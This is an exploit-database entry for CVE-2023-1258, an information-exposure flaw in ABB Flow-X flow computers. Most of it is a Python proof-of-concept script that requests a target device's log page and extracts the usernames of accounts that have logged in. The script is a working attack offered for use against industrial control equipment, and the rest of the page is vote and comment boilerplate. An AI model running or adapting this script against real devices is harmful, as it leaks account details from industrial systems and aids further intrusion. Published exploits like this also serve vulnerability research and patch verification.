ABB FlowX v4.00 Exposure of Sensitive Information

2023.07.21
Credit: Paul Smith
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information # Date: 2023-03-31 # Exploit Author: Paul Smith # Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series # Version: ABB Flow-X all versions before V4.00 # Tested on: Kali Linux # CVE: CVE-2023-1258 #!/usr/bin/python import sys import re from bs4 import BeautifulSoup as BS import lxml import requests # Set the request parameter url = sys.argv[1] def dump_users(): response = requests.get(url) # Check for HTTP codes other than 200 if response.status_code != 200: print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text) exit() # Decode the xml response into dictionary and use the data data = response.text soup = BS(data, features="xml") logs = soup.find_all("log") for log in logs: test = re.search('User (.*?) logged in',str(log)) if test: print(test.group(0)) def main(): dump_users() if __name__ == '__main__': main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top